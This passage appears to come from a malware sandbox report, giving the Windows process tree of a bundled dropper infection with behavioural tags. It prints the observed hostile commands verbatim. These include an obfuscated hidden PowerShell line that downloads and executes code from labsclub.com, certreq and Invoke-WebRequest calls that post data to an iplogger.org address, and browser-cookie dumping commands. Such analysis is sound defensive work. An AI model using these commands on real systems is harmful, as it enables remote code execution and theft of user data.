                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                            tapinstall.exe remove tap0901
                                            11⤵
                                              PID:5760
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                            10⤵
                                              PID:6168
                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                tapinstall.exe install OemVista.inf tap0901
                                                11⤵
                                                • Drops file in System32 directory
                                                • Drops file in Windows directory
                                                • Checks SCSI registry key(s)
                                                • Modifies system certificate store
                                                • Suspicious use of SetWindowsHookEx
                                                PID:6544
                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                              10⤵
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of SetWindowsHookEx
                                              PID:6024
                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                              10⤵
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4180
                                        • C:\Users\Admin\AppData\Local\Temp\5dwaeu3vzzk\Setup3310.exe
                                          "C:\Users\Admin\AppData\Local\Temp\5dwaeu3vzzk\Setup3310.exe" /Verysilent /subid=577
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:4660
                                          • C:\Users\Admin\AppData\Local\Temp\is-S3HUM.tmp\Setup3310.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-S3HUM.tmp\Setup3310.tmp" /SL5="$50048,802346,56832,C:\Users\Admin\AppData\Local\Temp\5dwaeu3vzzk\Setup3310.exe" /Verysilent /subid=577
                                            9⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SetWindowsHookEx
                                            PID:4812
                                        • C:\Users\Admin\AppData\Local\Temp\pxquu1j1akv\IBInstaller_97039.exe
                                          "C:\Users\Admin\AppData\Local\Temp\pxquu1j1akv\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:4952
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:188
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c taskkill /f /im chrome.exe
                                    5⤵
                                      PID:3892
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im chrome.exe
                                        6⤵
                                        • Kills process with taskkill
                                        PID:212
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:2392
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    PID:3172
                                    • C:\ProgramData\4245224.46
                                      "C:\ProgramData\4245224.46"
                                      5⤵
                                      • Executes dropped EXE
                                      PID:2056
                                    • C:\ProgramData\1204637.13
                                      "C:\ProgramData\1204637.13"
                                      5⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:2492
                                      • C:\ProgramData\Windows Host\Windows Host.exe
                                        "C:\ProgramData\Windows Host\Windows Host.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2584
                                    • C:\ProgramData\1174936.12
                                      "C:\ProgramData\1174936.12"
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:3780
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    PID:1976
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      5⤵
                                      • Executes dropped EXE
                                      PID:4132
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      5⤵
                                      • Executes dropped EXE
                                      PID:4716
                            • C:\Windows\system32\msiexec.exe
                              C:\Windows\system32\msiexec.exe /V
                              1⤵
                              • Enumerates connected drives
                              • Drops file in Program Files directory
                              • Drops file in Windows directory
                              • Suspicious use of AdjustPrivilegeToken
                              PID:812
                              • C:\Windows\syswow64\MsiExec.exe
                                C:\Windows\syswow64\MsiExec.exe -Embedding DEFD5E1E97CB4DE7B56A457E24B46B6C C
                                2⤵
                                • Loads dropped DLL
                                PID:740
                              • C:\Windows\system32\srtasks.exe
                                C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                2⤵
                                  PID:1988
                              • C:\Program Files (x86)\JCleaner\5.exe
                                "C:\Program Files (x86)\JCleaner\5.exe"
                                1⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:5044
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"
                                  2⤵
                                    PID:4120
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      3⤵
                                      • Delays execution with timeout.exe
                                      PID:5988
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
                                  1⤵
                                  • Blocklisted process makes network request
                                  • Drops file in System32 directory
                                  PID:5076
                                • C:\Users\Admin\AppData\Local\Temp\is-CELER.tmp\wimapi.exe
                                  "C:\Users\Admin\AppData\Local\Temp\is-CELER.tmp\wimapi.exe" 535
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2632
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                    2⤵
                                      PID:7044
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                        3⤵
                                          PID:7020
                                    • C:\Users\Admin\AppData\Local\Temp\is-MFV7R.tmp\winlthst.exe
                                      "C:\Users\Admin\AppData\Local\Temp\is-MFV7R.tmp\winlthst.exe" test1 test1
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetWindowsHookEx
                                      PID:5020
                                      • C:\Users\Admin\AppData\Local\Temp\6nTGkGjrw.exe
                                        "C:\Users\Admin\AppData\Local\Temp\6nTGkGjrw.exe"
                                        2⤵
                                        • Loads dropped DLL
                                        PID:5192
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 836
                                          3⤵
                                          • Program crash
                                          PID:5924
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 916
                                          3⤵
                                          • Program crash
                                          PID:6688
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 948
                                          3⤵
                                          • Program crash
                                          PID:5140
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1040
                                          3⤵
                                          • Program crash
                                          PID:6044
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1120
                                          3⤵
                                          • Program crash
                                          PID:368
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1188
                                          3⤵
                                          • Program crash
                                          PID:6376
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1276
                                          3⤵
                                          • Program crash
                                          PID:4200
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1156
                                          3⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          PID:2440
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                        2⤵
                                          PID:4144
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                            3⤵
                                              PID:6564
                                        • C:\Users\Admin\AppData\Local\Temp\is-UQLGE.tmp\{app}\chrome_proxy.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-UQLGE.tmp\{app}\chrome_proxy.exe"
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:5284
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-UQLGE.tmp\{app}\chrome_proxy.exe"
                                            2⤵
                                              PID:6996
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping localhost -n 4
                                                3⤵
                                                • Runs ping.exe
                                                PID:5488
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                            1⤵
                                            • Checks computer location settings
                                            PID:5240
                                          • C:\Windows\SysWOW64\certreq.exe
                                            certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
                                            1⤵
                                              PID:5472
                                            • C:\Windows\system32\vssvc.exe
                                              C:\Windows\system32\vssvc.exe
                                              1⤵
                                                PID:5492
                                              • C:\Users\Admin\AppData\Local\Temp\is-SCBSA.tmp\IBInstaller_97039.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-SCBSA.tmp\IBInstaller_97039.tmp" /SL5="$103CA,14452223,721408,C:\Users\Admin\AppData\Local\Temp\pxquu1j1akv\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                1⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in Program Files directory
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SetWindowsHookEx
                                                PID:4124
                                              • C:\Program Files (x86)\JCleaner\whiterauf.exe
                                                "C:\Program Files (x86)\JCleaner\whiterauf.exe"
                                                1⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:516
                                                • C:\Program Files (x86)\JCleaner\whiterauf.exe
                                                  "{path}"
                                                  2⤵
                                                    PID:7156
                                                  • C:\Program Files (x86)\JCleaner\whiterauf.exe
                                                    "{path}"
                                                    2⤵
                                                      PID:7164
                                                  • C:\Program Files (x86)\JCleaner\Venita.exe
                                                    "C:\Program Files (x86)\JCleaner\Venita.exe"
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:1600
                                                    • C:\Program Files (x86)\JCleaner\Venita.exe
                                                      "{path}"
                                                      2⤵
                                                        PID:6636
                                                      • C:\Program Files (x86)\JCleaner\Venita.exe
                                                        "{path}"
                                                        2⤵
                                                          PID:6648
                                                      • C:\Program Files (x86)\JCleaner\Abbas.exe
                                                        "C:\Program Files (x86)\JCleaner\Abbas.exe"
                                                        1⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:5112
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /c "start https://iplogger.org/1aSny7"
                                                        1⤵
                                                        • Checks computer location settings
                                                        PID:5068
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
                                                        1⤵
                                                          PID:5060
                                                        • C:\Users\Admin\AppData\Local\Temp\is-SJCN3.tmp\Setup.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\is-SJCN3.tmp\Setup.exe" /Verysilent
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5908
                                                          • C:\Users\Admin\AppData\Local\Temp\is-EL2M3.tmp\Setup.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-EL2M3.tmp\Setup.tmp" /SL5="$502C8,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-SJCN3.tmp\Setup.exe" /Verysilent
                                                            2⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Drops file in Windows directory
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:6016
                                                            • C:\Users\Admin\AppData\Local\Temp\is-K3KVM.tmp\PictureLAb.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-K3KVM.tmp\PictureLAb.exe" /Verysilent
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5592
                                                              • C:\Users\Admin\AppData\Local\Temp\is-OFNCA.tmp\PictureLAb.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-OFNCA.tmp\PictureLAb.tmp" /SL5="$8029A,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-K3KVM.tmp\PictureLAb.exe" /Verysilent
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:6180
                                                                • C:\Users\Admin\AppData\Local\Temp\is-BLA9C.tmp\Setup.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-BLA9C.tmp\Setup.exe" /VERYSILENT
                                                                  5⤵
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:6428
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-BL6AB.tmp\Setup.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-BL6AB.tmp\Setup.tmp" /SL5="$A0030,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-BLA9C.tmp\Setup.exe" /VERYSILENT
                                                                    6⤵
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:6472
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-E5MB5.tmp\kkkk.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-E5MB5.tmp\kkkk.exe" /S /UID=lab214
                                                                      7⤵
                                                                        PID:6596
                                                                        • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                          dw20.exe -x -s 1272
                                                                          8⤵
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:4116
                                                              • C:\Users\Admin\AppData\Local\Temp\is-K3KVM.tmp\Delta.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-K3KVM.tmp\Delta.exe" /Verysilent
                                                                3⤵
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:6628
                                                              • C:\Users\Admin\AppData\Local\Temp\is-K3KVM.tmp\zznote.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-K3KVM.tmp\zznote.exe" /Verysilent
                                                                3⤵
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:7024
                                                                • C:\Users\Admin\AppData\Local\Temp\is-F71LV.tmp\zznote.tmp
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-F71LV.tmp\zznote.tmp" /SL5="$503DE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-K3KVM.tmp\zznote.exe" /Verysilent
                                                                  4⤵
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:7084
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-QE9OT.tmp\jg4_4jaa.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-QE9OT.tmp\jg4_4jaa.exe" /silent
                                                                    5⤵
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:6620
                                                              • C:\Users\Admin\AppData\Local\Temp\is-K3KVM.tmp\hjjgaa.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-K3KVM.tmp\hjjgaa.exe" /Verysilent
                                                                3⤵
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:8
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  4⤵
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:6936
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  4⤵
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:4564
                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                            1⤵
                                                              PID:4652
                                                            • C:\Windows\system32\browser_broker.exe
                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                              1⤵
                                                              • Modifies Internet Explorer settings
                                                              PID:5656
                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                              1⤵
                                                                PID:5464
                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                1⤵
                                                                • Modifies Internet Explorer settings
                                                                • Modifies registry class
                                                                PID:4164
                                                              • \??\c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                1⤵
                                                                • Checks SCSI registry key(s)
                                                                PID:6664
                                                              • C:\Users\Admin\AppData\Local\Temp\is-MF2UM.tmp\Delta.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-MF2UM.tmp\Delta.tmp" /SL5="$80360,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-K3KVM.tmp\Delta.exe" /Verysilent
                                                                1⤵
                                                                • Loads dropped DLL
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:6704
                                                                • C:\Users\Admin\AppData\Local\Temp\is-EF54T.tmp\Setup.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\is-EF54T.tmp\Setup.exe" /VERYSILENT
                                                                  2⤵
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:6976
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1012
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:7092
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1000
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:6316
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1092
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:5176
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1112
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:3808
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1192
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:6792
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1240
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:6944
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1488
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:6992
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1544
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:7096
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1612
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:6328
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1648
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:5348
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1532
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:3088
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1580
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:4720
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1456
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:6892
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1620
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:4008
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1740
                                                                    3⤵
                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                    • Program crash
                                                                    PID:6696
                                                              • \??\c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                1⤵
                                                                • Drops file in Windows directory
                                                                • Checks SCSI registry key(s)
                                                                PID:204
                                                                • C:\Windows\system32\DrvInst.exe
                                                                  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{3f579dc7-daf7-6e4b-9a3b-f20b7ade824a}\oemvista.inf" "9" "4d14a44ff" "0000000000000134" "WinSta0\Default" "0000000000000130" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                  2⤵
                                                                  • Drops file in System32 directory
                                                                  • Drops file in Windows directory
                                                                  • Checks SCSI registry key(s)
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:6896
                                                                • C:\Windows\system32\DrvInst.exe
                                                                  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000094"
                                                                  2⤵
                                                                  • Drops file in Drivers directory
                                                                  • Drops file in System32 directory
                                                                  • Drops file in Windows directory
                                                                  • Checks SCSI registry key(s)
                                                                  PID:4112
                                                              • \??\c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                1⤵
                                                                  PID:5924
                                                                • \??\c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                  1⤵
                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                  PID:3816
                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                  1⤵
                                                                    PID:3928
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                      PID:4260
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                      1⤵
                                                                      • Drops file in Windows directory
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:6848
                                                                    • C:\Windows\system32\browser_broker.exe
                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                      1⤵
                                                                      • Modifies Internet Explorer settings
                                                                      PID:6928
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:5696
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:5004
                                                                    • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                      "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                      1⤵
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:5608
                                                                      • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                        MaskVPNUpdate.exe /silent
                                                                        2⤵
                                                                        • Drops file in Program Files directory
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:6744
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:4824
                                                                    • C:\Windows\windefender.exe
                                                                      C:\Windows\windefender.exe
                                                                      1⤵
                                                                        PID:6416
                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                        1⤵
                                                                        • Modifies registry class
                                                                        PID:1400
